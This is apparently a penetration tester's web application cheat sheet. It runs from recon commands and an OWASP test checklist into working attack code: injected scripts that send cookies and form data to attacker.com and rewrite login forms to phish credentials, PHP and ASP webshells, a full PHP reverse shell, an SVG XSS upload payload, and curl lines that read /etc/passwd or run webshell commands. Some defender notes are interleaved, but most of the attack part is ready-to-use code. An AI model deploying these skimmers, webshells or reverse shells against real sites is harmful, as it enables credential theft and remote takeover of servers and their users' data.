
APIs & Web Applications

API WEB Tools

Burp Suite Certified Practitioner WebApp Studies

OWASP

Web App Testing

TCP 80/443 HTTP - Web Applications

  • Subdomain discovery tool

  • subfinder -d groupservice.co.za -all -o subdomains.txt

  • ffuf

ffuf -c -w ~/Downloads/wordlists/9-big.txt -u http://eezy.box/secret/FUZZ -e .git,.txt,.json,.php

ffuf -c -ic -w 0-common-with-mylist.txt -u https://point.bank.com/FUZZ -recursion -mc 200,201,300-307,400,401,403,405,415
gobuster vhost -u http://jeff.thm -w /opt/SecLists/Discovery/DNS/namelist.txt
dirsearch -u http://target.net/ -w directory-list-2.3-medium.txt -x 400,401,403 -e *
  • feroxbuster
feroxbuster -u https://target.net/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html -t 200 -C 400,404,401,403,429

feroxbuster -u https://target.net/ -H 'Cookie: acceptCookies=y; _ga=GA1.3.1.1; nmstat=04dafef3; _ga_1=1$o2$g1$1$$h0; XSESSIONID=123-123-123; TS01f7a886=123'
  • wpscan
wpscan --url jack.thm --enumerate ap,at,cb,dbe --api-token rfzQVk...
cewl -w collect-words-from-fuse.txt -d 10 -m 1 http://fuse.fabricorp.local/papercut/logs/html/
cewl -w oscp-words.txt -d 10 -m 5 http://192.168.56.151/
cewl -w collect-more-words.txt -d 10 -m 1 http://10.10.10.188/author.html

## sort and unique
# NOTE: `uniq -u` prints only lines that occur exactly once, so any word cewl
# collected more than once is dropped rather than deduplicated; `sort -u`
# (or `sort | uniq`) keeps one copy of every word.
sort collect-words-from-fuse.txt | uniq -u > unique_list.txt

cewl https://target.co/web/porta/ -w wordlist.txt --header 'Cookie: acceptCookies=y; XSESSIONID=123-123-123; TS01=123'
  • wget
  • wget http://target.net:9191/data --http-user=admin --http-password=Fabricorp013

curl

  • send via proxy intercept
curl -x 127.0.0.1:8080 -sk -X GET "https://target.com/external" -H $'Accept: application/json, text/plain, */*' -H $'Content-Type: application/json' -H $'User-Agent: command-line-test' -H $'Ocp-Apim-Subscription-Key: snip' -H $'Authorization: Bearer snip.snip.snip'
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile

curl -d "user=lay&pass=simple&submit=submit" -X POST http://ctf100.thm/hidden/	

curl --user offsec:elite 192.168.68.46:242/pwn.php

curl http://192.168.164.127:33033/users/4/edit --cookie _userpro_medjed_session=27M1j4motXCY8< snip >giqG%2F

curl http://muddy.ugc/webdav/php-reverse-shell.php -u administrant:sleepless

curl http://authenticate.thm:5000/protected -H "Content-Type: application/json" -H "Authorization: JWT JWT.JWT.JWT"

curl http://nappa.offsec:8080/register | grep -ie 'href\|<!-\|pass' -A1 -B1

curl http://hunit.offsec:8080/article/the-taste-of-rain | grep -ie '<!-' -A 1 -B 2

curl 10.11.1.71 -s -L | html2text -width '99' | uniq

curl --user offsec:elite -v http://authby.offsec:242/webshell.php?cmd=whoami --proxy http://127.0.0.1:8080

curl http://authenticate.thm:8888/register/submit --data "user=%20darren&email=fake&password=12345" -c cookies -b cookies
  • Browsing web application
  • wappalyzer
  • httpOnly False
  • javascript
  • back ticks
  • login page
  • robots.txt
  • domain names
  • source code & Dev Tools
  • whatweb
whatweb challenge.sensepost.ninja
  • davtest
davtest -auth fmcsorley:CrabSharkJellyfish192 -url http://192.168.159.122/ -uploadfile cmd.asp -uploadloc /cmd.asp
  • wafw00f
wafw00f http://target.net/
  • sslscan
sslscan xor-app59.xor.com
  • owasp-zap

  • HTTPX Request Enumeration httpx https://www.groupservice.co.za

  • Tools & Methods

  • gobuster

  • unshorten tiny URL

  • directory Brute Force

  • robots.txt

  • cookies

  • DNS

  • dirb

  • Burp Suite Extensions

    • Turbo Intruder
    • Backslash Powered scanner
    • Param Miner
    • Active Scan++
    • JS Link Finder
    • JWT Editor / JSON Web Token
    • HTTP Request Smuggler
    • Host Header Inchecktion
    • Kerberos Authentication
    • PwnFox For Chromium - Browser profiles
    • JSpector - passively crawls JavaScript Files
    • SQLiPy - SQLMAP
  • curl

  • Fingerprint Web Server-INFO002

  • Fingerprint Web App-INFO009

  • Configuration (CONFIG)

  • Sensitive Information-CONFIG004

  • Admin Interfaces-CONFIG005

  • Identity (IDENT)

  • User Registration-IDENT002

  • Authentication (AUTHN)

  • account lock-AUTHN003

  • Weak password policy-AUTHN007

  • Weak password change/reset-AUTHN009

  • Authorization (AUTHZ)

  • IDOR-AUTHZ004

  • Session (SESS)

  • Session Management Schema SESS001

  • Input Validation (INPVAL)

  • reflected XSS-INPVAL001

  • SQL Injection-INPVAL005

  • SQLMAP

  • SQLi Payloads

  • UNION Attacks

  • Stored XSS

  • Session Hijacking with Navigation Hooking

<script>
// Click hook registered in the capture phase (third argument `true`), so it runs
// before any of the page's own click handlers and sees every click that resolves
// to an <a> element with an href.
// Defender notes: document.cookie exposes only cookies that lack the HttpOnly
// attribute; a CSP `connect-src` limited to the application's own origins blocks
// the outbound fetch; the preventDefault()-then-delayed-navigation sequence is
// the client-side artefact to look for in CSP violation reports / RUM telemetry.
document.addEventListener('click', function(e) {
	const anchor = e.target.closest('a');
	if (anchor && anchor.href) {
		e.preventDefault();
		// Exfiltrate before navigation
		fetch('https://attacker.com/log?cookie=' + document.cookie + '&url=' + anchor.href);
		// Continue to destination to avoid suspicion
		setTimeout(() => window.location = anchor.href, 100);
	}
}, true);
</script>
  • Captures login credentials, payment info, personal data from all forms
<script>
// Capture-phase submit hook: runs before the form's own handlers for every
// <form> on the page, copies each field of the FormData into a plain object and
// POSTs it as JSON. preventDefault() is never called, so the real submission
// still goes through and nothing visible changes for the user.
// Defender notes: a CSP `connect-src` restricted to the application's origins
// stops the POST; a `script-src` allowlist (or nonces/hashes) stops the hook
// from being injected in the first place; CSP `report-to` surfaces the attempt.
document.addEventListener('submit', function(e) {
	const form = e.target;
	const formData = new FormData(form);
	const data = {};
	
	for(let [key, value] of formData.entries()) {
		data[key] = value;
	}
	
	// Exfiltrate form data (credentials, PII, etc.)
	fetch('https://attacker.com/harvest', {
		method: 'POST',
		body: JSON.stringify(data)
	});
	
	// Allow form to continue normally
}, true);
</script>
  • DOM Manipulation for Phishing, Credential harvesting that's nearly impossible for users to detect
<script>
// Wait for login form to appear
// Wait for login form to appear
// Observes the whole document for added/removed nodes; on each batch of
// mutations it re-queries for a form whose action contains "login" and, when one
// is present, rewrites that form's action attribute and also clones the form
// with a submit handler that posts the fields elsewhere before calling submit()
// on the original.
// Defender notes: a CSP `form-action` directive limited to the site's own origin
// makes the browser refuse to submit to the rewritten action; `connect-src`
// blocks the clone's fetch; a `script-src` allowlist prevents the injection.
const observer = new MutationObserver(function(mutations) {
	mutations.forEach(function(mutation) {
		const loginForm = document.querySelector('form[action*="login"]');
		if (loginForm) {
			// Change form action to attacker server
			loginForm.setAttribute('action', 'https://attacker.com/phish');
			
			// Or duplicate and hide original
			const fakeForm = loginForm.cloneNode(true);
			fakeForm.addEventListener('submit', function(e) {
				e.preventDefault();
				const formData = new FormData(fakeForm);
				fetch('https://attacker.com/creds', {
					method: 'POST',
					body: formData
				}).then(() => {
					// Submit to real endpoint after exfiltration
					loginForm.submit();
				});
			});
		}
	});
});

// Subtree observation of <body>: every DOM change anywhere on the page triggers the callback above.
observer.observe(document.body, { childList: true, subtree: true });
</script>
  • Code Injection-INPVAL012
  • Server-side template injection
  • Splitting/Smuggling-INPVAL016
  • Error Handling (ERR)
  • Weak Cryptography (CRYPST)
  • Padding Oracle CRYPST002
  • Business Logic (BUSLOGIC)
  • Work Flows-BUSLOGIC006
  • Client Side (Client)
  • DOM Cross site scripting-CLIENT001
  • Resource Manipulation CLIENT006
  • CORS CLIENT007
  • ClickJacking CLIENT009

WebShells

  • webshell.php
<?php system($_GET['cmd']); ?>
  • webshell.php
<?php
// Simple PHP webshell
// Access: shell.php?cmd=whoami
// NOTE(review): $_REQUEST merges GET, POST and cookie input, so inspecting
// request URLs alone does not cover every way the parameter can arrive;
// process-creation telemetry on the web server is the more reliable signal.
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    // the value is executed unmodified, with no authentication or allowlist
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    // stop here so nothing else on the page is rendered after the output
    die;
}
?>
  • webshell.aspx
<% eval request('cmd') %>
  • IIS webshell.aspx
<!-- Working on latest IIS  -->
<!-- Classic ASP (VBScript) page that runs the value of the "cmd" request parameter
     through cmd.exe and echoes its stdout below the form. oScript and oFileSys are
     created here but never used; execution happens in getCommandOutput. -->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' Executes theCommand with WScript.Shell.Exec and returns everything written to
' stdout. stderr is not captured.
Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>

<HTML>
<BODY>
<FORM action="" method="GET">
<!-- szCMD is written back unescaped, so the submitted value is reflected into the page -->
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<!-- label repeats "software" although the value written here is LOCAL_ADDR -->
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<%
' request("cmd") is appended to "cmd /c" with no validation and run under the
' account the page executes as. Detection: cmd.exe spawned by the IIS worker
' process, and requests to this page carrying a cmd parameter.
szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Reverse Shell

  • PHP Reverse Shell
<?php
// PHP Reverse Shell to 192.168.111.2:4444
// Start listener: nc -lvnp 4444
//
// Defender notes: the observable artefacts of this script are the web-server
// process forking and calling setsid (pcntl_fork / posix_setsid), an outbound
// TCP connection from that process to $ip:$port, and proc_open() spawning
// $shell with all three standard streams piped. Egress filtering on the web
// tier and listing pcntl_*/proc_open/fsockopen in php.ini disable_functions
// break the chain.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.111.2';  // CHANGE THIS
$port = 4444;           // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'cmd.exe';     // Windows
$daemon = 0;
$debug = 0;

// Detach from the web server request when the pcntl extension is available:
// parent exits, child becomes a session leader.
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise");
}

chdir("/");
umask(0);

// Outbound connection to the listener (30 s connect timeout).
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// stdin, stdout and stderr of the spawned shell are all piped back here.
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Pump loop: bytes arriving on the socket go to the shell's stdin; whatever
// the shell writes to stdout or stderr goes back out on the socket.
// Exits when either side closes.
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Console output helper guarded by $daemon.
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>

File Upload Samples

  • EICAR Payload
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • SVG XSS Image Payload
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- Upload test: an SVG carrying an inline <script>. The script executes when the
     file is opened as a document in its own browsing context, not when it is
     referenced from an <img> element. Receiving-side mitigations: serve user
     uploads from a separate origin with Content-Disposition: attachment, and
     strip <script> elements and on* attributes from SVG before storing it. -->

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>

Reference